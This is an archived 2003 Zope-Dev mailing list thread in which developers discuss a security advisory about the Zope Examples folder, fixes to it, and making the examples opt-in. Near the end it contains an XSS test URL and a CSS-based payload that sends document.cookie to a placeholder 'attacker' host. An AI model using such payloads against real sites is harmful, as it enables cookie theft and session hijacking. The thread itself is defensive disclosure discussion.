weak examples, weak exploits
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt This hit the full-disclosure list the other day. Vulnerabilities 1 and 3 are moot and have been since the introduction of SiteErrorLog. Although if the responsible parties had bothered digging a little deeper they'd have found the BCI HTTP headers and likely thrown a fit. Anyway, if you can wade your way past the all the spelling errors you'll see the 0day exploits are your typical abuse of badly code web apps, and apart from 1 and 3 there are probably legitimate bugs there. Your predictable response: There's just examples. Uninstall them. They shouldn't be left on a production system. Sure, you know that, I know that, my cat knows that. Joe Six Pack told me he knew, but he didn't care. Which tends to the be the consensus. But thats no excuse to be shipping bad examples. They should be fixed, bad examples are worse than no examples at all. I'll submit a fixed Examples.zexp but I need to know how its normally prepared, ownership, etc. Is there anything special I should do? -- Jamie Heilman http://audible.transient.net/~jamie/ "I was in love once -- a Sinclair ZX-81. People said, "No, Holly, she's not for you." She was cheap, she was stupid and she wouldn't load -- well, not for me, anyway." -Holly
On Mon, 2003-06-23 at 09:20, Jamie Heilman wrote:
I'll submit a fixed Examples.zexp but I need to know how its normally prepared, ownership, etc. Is there anything special I should do?
No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code. The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present. seb
seb bacon wrote:
No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code.
'k I can do that
The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.
You know, ironically, I don't think this "advisory" even covers that hole. There's obvious DoS potential in the guest book and such, but thats easily limited without degrading the value of the example. Anyway, I'll scrape over the examples and see what I can clean up. -- Jamie Heilman http://audible.transient.net/~jamie/ "Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. -Casey On Monday 23 June 2003 05:12 am, Jamie Heilman wrote:
seb bacon wrote:
No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code.
'k I can do that
The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.
You know, ironically, I don't think this "advisory" even covers that hole. There's obvious DoS potential in the guest book and such, but thats easily limited without degrading the value of the example. Anyway, I'll scrape over the examples and see what I can clean up.
-- Jamie Heilman http://audible.transient.net/~jamie/ "Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa
_______________________________________________ Zope-Dev maillist - Zope-Dev@zope.org http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
+1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really dont want the HelpSys in my ZODB either :) -- Andy McKay http://www.agmweb.ca
On Monday 23 June 2003 12:00 pm, Andy McKay wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
+1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really dont want the HelpSys in my ZODB either :)
Actually the add form could be linked from the Quick Start page to make it really stupid simple. -Casey
Andy McKay wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
+1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really dont want the HelpSys in my ZODB either :)
Removing the help system could also appreciably boost startup time. I can't remember the last time I used the help system, yet it creates a ZCatalog for each Zope product. It would beneficial to allow users to disable it completely. Shane
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
Many, many moons ago I created evan-examples-branch, which allows individual Products to offer sample code without (magically or otherwise) forcing them upon the user. I'd love to see it revived, perhaps as "Examples/Optional Extras" in order to cover the Hurt system as well. The basic idea is to look for an XML manifest file 'examples/index.xml' in each Product. It probably wouldn't be very hard to use ZConfig instead of XML. Here is the PageTemplates index.xml: <example name="Assorted Examples"> <description> This is a set of examples of the use of page templates. It includes examples of batching, macros, and trees. </description> <payload> <import file="zpt_examples.zexp"/> </payload> <view url="zpt_examples"/> </example> <!-- This file can contain any number of examples. Each one consists of an <example> with a 'name' attribute, containing exactly one <description>. The name and description are displayed in the Examples page. <description> can have a 'format' attribute set to 'plain' (the default), 'stx' (structured text), or 'html'. An <example> can contain <payload> elements. Each <payload> can contain any number of <import>, <execute>, and <call> elements. These are processed in order when an example is selected from the Examples page. <import> must have a 'file' attribute that names a file in the 'examples' directory to be imported. <execute> must have a 'file' attribute that names a file to be run with execfile. <call> must have a 'path' attribute that gives the path to a Zope object to be called. An <example> can contain at most one <view> element. The 'url' attribute of a <view> is the URL to view after all <payload> elements have been processed. This URL can be relative to the current folder. --> Cheers, Evan @ 4-am
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
Many, many moons ago I created evan-examples-branch, which allows individual Products to offer sample code without (magically or otherwise) forcing them upon the user. I'd love to see it revived, perhaps as "Examples/Optional Extras" in order to cover the Hurt system as well.
This seems like a fine idea, but what action would the user take to install examples and extras? Shane
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. This seems like a fine idea, but what action would the user take to install examples and extras? I think the best way would be using a python script/Makefile that installs a .zexp file (or use http-upload with httplib). Configure should grow a --install-tutorial option.
Pieter -- http://zwiki.org/PieterB
PieterB wrote:
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
This seems like a fine idea, but what action would the user take to install examples and extras?
I think the best way would be using a python script/Makefile that installs a .zexp file (or use http-upload with httplib). Configure should grow a --install-tutorial option.
Mmmm... I need to clarify my question. Let's say you make and install Zope. You fire it up and don't know what to do next. You look for some button or control in the UI for displaying documentation and examples. What do you find? An entry in the add list? Will you still find the "help" link, but clicking it only tells you how to install the documentation? Zope needs to help the user find the docs. Shane
On Tue, 2003-06-24 at 10:09, Shane Hathaway wrote:
PieterB wrote:
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
This seems like a fine idea, but what action would the user take to install examples and extras?
I think the best way would be using a python script/Makefile that installs a .zexp file (or use http-upload with httplib). Configure should grow a --install-tutorial option.
Mmmm... I need to clarify my question. Let's say you make and install Zope. You fire it up and don't know what to do next. You look for some button or control in the UI for displaying documentation and examples. What do you find? An entry in the add list? Will you still find the "help" link, but clicking it only tells you how to install the documentation? Zope needs to help the user find the docs.
Jamie Heilman came up with a reasonable way to do this. The Zope Quick Start page instructs the user to import the examples and gives him a link which does so by calling manage_import. I've merged this into the HEAD and the 2.6 branch. - C
Chris McDonough wrote:
Jamie Heilman came up with a reasonable way to do this. The Zope Quick Start page instructs the user to import the examples and gives him a link which does so by calling manage_import.
Actually... /me points at Casey ...not my idea, I just implemented a good suggestion.
Shane Hathaway wrote:
This seems like a fine idea, but what action would the user take to install examples and extras?
In my initial implementation, there was a separate page that listed the names and descriptions of the various examples, with links to install them. If I recall correctly, this page was reached from a link on Folder views, much like the current "Help" link. Also linking from the Quick Start sounds like a fine idea. Cheers, Evan @ 4-am
On Mon, Jun 23, 2003 at 10:33:42AM -0400, Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it.
Moreover, the examples installed everywhere attract spam to docs@zope.com (forwarded to zdp@zope.org). I have seen numerous 'increase website traffic' spams explicitly mentioning /Examples URLs around the net. -- Martijn Pieters | Software Engineer mailto:mj@zope.com | Zope Corporation http://www.zope.com/ | Creators of Zope http://www.zope.org/ ---------------------------------------------
seb bacon wrote:
The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.
I opted for a patch that simply removes all the magic auto-install crud and goes for the installer link on the quick-start page. As for previous zope installations, well, I don't feel like trying to figure out how to examine the zodb and warn people if they've got bad examples still installed, it strikes me as too much junk in the startup procedure which is already too slow as it is. I say chalk it up as a lessoned learned and move on. As for my reworked examples, I added missing quoting to the navigation examples, size limits and entry limits to the guest book, size limits and entry limits to the file library, and additional sanity checking and robustness to just about everything. Examining the original advisory this is how I break it down: 1) moot with the addition of SiteErrorLog 2) Examples/db no longer exists in the Examples, I'm unaware if it ever did, at any rate, not a problem 3) moot with the addition of SiteErrorLog 3a) this is a problem, see below 3b) fixed in my reworking 3c) I was unable to reproduce this, maybe a bug with older Zopes? extra notes) wtf? I have no idea what the the advisory author was trying to say by including that diff, and I have feeling he doesn't know either. I mean, it has the words 'examples' and 'security' in it, but that doesn't make it relevant. There is unfortunately, a snag. One of the exploits (3a) as it turns out is actually a problem deeper down. To isolate a test case make a script like: ## Script (Python) "aww_shit_now_what" ##bind container=container ##bind context=context ##bind namespace= ##bind script=script ##bind subpath=traverse_subpath ##parameters=i ##title= ## return int(i) Then call it http://host/aww_shit_now_what=<b>old+flava' This can be disarmed by ensuring that in your standard_error_message you quote the results of error_msg, however this isn't the default, and it will result in a lot of broken and ugly looking (albeit safer) error pages. I haven't fully figured out exactly whats going on with that whole thing yet. I have a feeling its atributable to either raise_standardErrorMessage's "smart" tag searching, or some other auto-magical aspect of the error handling framework. (clues appreciated) In the mean time I suggest quoting error_msg. -- Jamie Heilman http://audible.transient.net/~jamie/ "...thats the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity..." -Rimmer
Jamie Heilman wrote:
Then call it http://host/aww_shit_now_what=<b>old+flava'
er, http://host/aww_shit_now_what?i=<b>old+flava' rather. -- Jamie Heilman http://audible.transient.net/~jamie/ "Paranoia is a disease unto itself, and may I add, the person standing next to you may not be who they appear to be, so take precaution." -Sathington Willoughby
On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman <jamie@audible.transient.net> wrote:
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt [snip] apps, and apart from 1 and 3 there are probably legitimate bugs there.
related issues: CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits to anonymous users or person without good references to write. To cope with the matter, I stupidly put multiple string substitution. t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t) t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t) t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t) It would be appreciated if someone advices me more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementaition may be left to each developer. If it had ability to avoid them, it would be much better, I think. Another example Following sample may allow malicious.css import from outside of the site. Put #1 or #2 to a StructuredText page. #1 <LINK rel="stylesheet" href="http://attacker/malicious.css"> #2 <STYLE type="text/css"> @import url('http://attacker/malicious.css'); </STYLE> # expample of malicious.css http://attacker/malicious.css body { left: expression(eval( 'document.location="http://attacker/"+document.cookie;')) } For example, make a 'Document' in a CMFDefault site, and put #1 to the reply form, DiscussionItem, against the original document, etc. It seems CMFDefault is vulnerable to this attack. Any general remedy for that kind of exploit? -- Kazuya Fukamachi
participants (10)
-
Andy McKay -
Casey Duncan -
Chris McDonough -
Evan Simpson -
Jamie Heilman -
Kazuya FUKAMACHI -
Martijn Pieters -
PieterB -
seb bacon -
Shane Hathaway